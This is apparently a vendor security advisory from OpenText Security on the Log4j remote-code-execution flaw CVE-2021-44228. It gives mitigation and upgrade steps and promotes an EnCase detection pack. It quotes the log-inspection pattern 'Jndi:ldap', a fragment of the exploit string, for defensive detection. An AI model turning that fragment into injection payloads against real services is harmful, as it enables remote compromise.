Threat Hunts must include cloud, network, endpoint, log and email vectors
Note: OpenText™ Security reports that there is no Log4j impact on its EnCase suite of products including EnCase Endpoint Investigator, EnCase Endpoint Security, EnCase Forensic, EnCase Information Assurance, EnCase Mobile Investigator, and Tableau Forensic. See the latest OpenText Security Alert here.
Top US cybersecurity officials have warned of the zero-day vulnerability found in the Java logging library Apache Log4j.
ZDNet reports that the vulnerability, being tracked as CVE-2021-44228, is “severe and allows unauthenticated remote code execution as the user running the application utilizes the Java logging library.”
It further writes that CERT New Zealand warns that it’s already being exploited in the wild.
Log4J is a popular Java library for logging error messages in applications. This vulnerability lets any remote attacker take control of another device on the internet if it’s running Log4J versions 2.0 to 2.14.1.
“This vulnerability is one of the most serious that I’ve seen in my entire career, if not the most serious,” Jen Easterly, director of CISA said in a call shared with CNN. Easterly has spent 20 years in various federal cybersecurity roles. “We expect the vulnerability to be widely exploited by sophisticated actors and we have limited time to take necessary steps in order to reduce the likelihood of damage,” she said. The call, with US critical infrastructure owners and operators, was first reported by CyberScoop.
Turn on breach mentality
Given the severity and urgency of the Log4j vulnerability, OpenText Security advises customers to employ a breach mentality and immediately initiate detection and response measures. Any anomaly should be validated against CVE-2021-44228 and appropriate remediation and recovery measures activated.
As a first step to understanding the attack surface, customers of EnCase Endpoint Security can use the “Find Hosts with IOCs” capability to hunt for instances of log4j.jar files across the enterprise.
According to researchers at LunaSec, organizations can identify if they’re affected by examining the log files for any services using affected Log4j versions. If they contain user-controlled strings, CERT-NZ uses the example of “Jndi:ldap”, they could be affected.
To mitigate vulnerabilities, users should switch log4j2.formatMsgNoLookups to true by adding:”‐Dlog4j2.formatMsgNoLookups=True” to the JVM command for starting the application. To prevent the library from being exploited, it’s urgently recommended that Log4j versions be upgraded to log4j-2.15.0-rc1.
The Log4j vulnerability detection pack is now available for EnCase Endpoint Security.
This detection pack includes filters that will locate the presence of vulnerable versions of Log4j using hashes, as well as searches that detect active and past exploitations based on Indicators of Compromise (IOCs).
Customers and partners can download the detection pack and documentation from the OpenText My Support website here.
Talk to one of our security experts for more information.
